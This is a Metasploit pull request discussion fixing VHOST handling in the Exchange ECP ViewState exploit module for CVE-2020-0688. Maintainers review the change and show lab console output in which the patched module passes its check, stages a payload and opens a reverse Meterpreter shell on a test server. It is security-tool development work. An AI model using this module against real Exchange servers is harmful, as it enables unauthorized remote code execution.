Use VHOST instead of RHOST

[t0-n1]

The 'vhost_uri: true' enables the successfully exploitation of this vulnerability in environments where you can't use an IP address (RHOST) to access the OWA web page.

#11485

[smcintyre-r7]

Looks good, I'll get this tested and merged in assuming no issues are found. Thanks!

[smcintyre-r7]

Before the patch

msf5 exploit(windows/http/exchange_ecp_viewstate) > set VHOST exchange.msflab.local
VHOST => exchange.msflab.local
msf5 exploit(windows/http/exchange_ecp_viewstate) > check

[-] Exploit aborted due to failure: unexpected-reply: Failed to get the __VIEWSTATEGENERATOR page
[-] 192.168.159.144:443 - Check failed: The state could not be determined.
msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[-] Exploit aborted due to failure: unexpected-reply: Failed to get the __VIEWSTATEGENERATOR page
[*] Exploit completed, but no session was created.
msf5 exploit(windows/http/exchange_ecp_viewstate) >

After the patch

msf5 exploit(windows/http/exchange_ecp_viewstate) > set VHOST exchange.msflab.local
VHOST => exchange.msflab.local
msf5 exploit(windows/http/exchange_ecp_viewstate) > check
[+] 192.168.159.144:443 - The target is vulnerable.
msf5 exploit(windows/http/exchange_ecp_viewstate) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Command Stager progress -   3.61% done (449/12424 bytes)
[*] Command Stager progress -   7.23% done (898/12424 bytes)
[*] Command Stager progress -  10.84% done (1347/12424 bytes)
[*] Command Stager progress -  14.46% done (1796/12424 bytes)
[*] Command Stager progress -  18.07% done (2245/12424 bytes)
[*] Command Stager progress -  21.68% done (2694/12424 bytes)
[*] Command Stager progress -  25.30% done (3143/12424 bytes)
[*] Command Stager progress -  28.91% done (3592/12424 bytes)
[*] Command Stager progress -  32.53% done (4041/12424 bytes)
[*] Command Stager progress -  36.14% done (4490/12424 bytes)
[*] Command Stager progress -  39.75% done (4939/12424 bytes)
[*] Command Stager progress -  43.37% done (5388/12424 bytes)
[*] Command Stager progress -  46.98% done (5837/12424 bytes)
[*] Command Stager progress -  50.60% done (6286/12424 bytes)
[*] Command Stager progress -  54.21% done (6735/12424 bytes)
[*] Command Stager progress -  57.82% done (7184/12424 bytes)
[*] Command Stager progress -  61.44% done (7633/12424 bytes)
[*] Command Stager progress -  65.05% done (8082/12424 bytes)
[*] Command Stager progress -  68.67% done (8531/12424 bytes)
[*] Command Stager progress -  72.28% done (8980/12424 bytes)
[*] Command Stager progress -  75.89% done (9429/12424 bytes)
[*] Command Stager progress -  79.51% done (9878/12424 bytes)
[*] Command Stager progress -  82.74% done (10279/12424 bytes)
[*] Command Stager progress -  86.15% done (10703/12424 bytes)
[*] Command Stager progress -  89.43% done (11111/12424 bytes)
[*] Command Stager progress -  92.91% done (11543/12424 bytes)
[*] Command Stager progress -  96.28% done (11962/12424 bytes)
[*] Sending stage (206403 bytes) to 192.168.159.144
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.144:43131) at 2020-03-09 10:36:19 -0400
[*] Command Stager progress -  99.84% done (12404/12424 bytes)
[*] Command Stager progress - 100.00% done (12424/12424 bytes)

meterpreter > 

I'll land this in just a moment.

[smcintyre-r7]

Release Notes

This fixes a bug in the exchange_ecp_viewstate (CVE-2020-0688) module to properly use the VHOST value. This allows Metasploit to exploit targets where IIS has a Host Name specified in the Bindings section of the web application's configuration.

[wvu]

Nice, I'm glad the option was useful to someone else.

[smcintyre-r7]

@wvu-r7 I was thinking, is there a reason not to enable it as the default?

[wvu]

I don't see why it can't be, since RHOST(S) is used for the connect, and this is just for the URI. I assume we didn't want to break existing behavior, but if someone wants to adequately check for regressions, they can feel free to change the behavior.